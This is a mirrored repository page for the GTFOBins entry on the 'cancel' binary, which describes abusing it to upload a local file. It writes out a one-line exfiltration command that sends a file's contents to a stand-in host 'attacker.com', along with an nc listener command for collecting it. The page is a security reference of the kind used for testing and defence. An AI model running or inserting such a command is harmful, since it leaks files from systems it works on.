This website requires JavaScript.
Explore
Help
Register
Sign In
mirror
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io.git
synced
2026-01-03 06:01:39 +01:00
Code
Issues
9ec96219a3
GTFOBins.github.io
/
_gtfobins
/
cancel.md
Emilio Pinna
bbfcb5b633
Keep cancel description consistent
2018-12-31 09:40:49 +01:00
311 B
Raw
Blame
History
functions
file-upload
description
code
Send local file using a TCP connection. Run `nc -l -p 12345 > "file_to_save"` on the attacker box to collect the file.
RHOST=attacker.com RPORT=12345 LFILE=file_to_send cancel -u "$(cat $LFILE)" -h $RHOST:$RPORT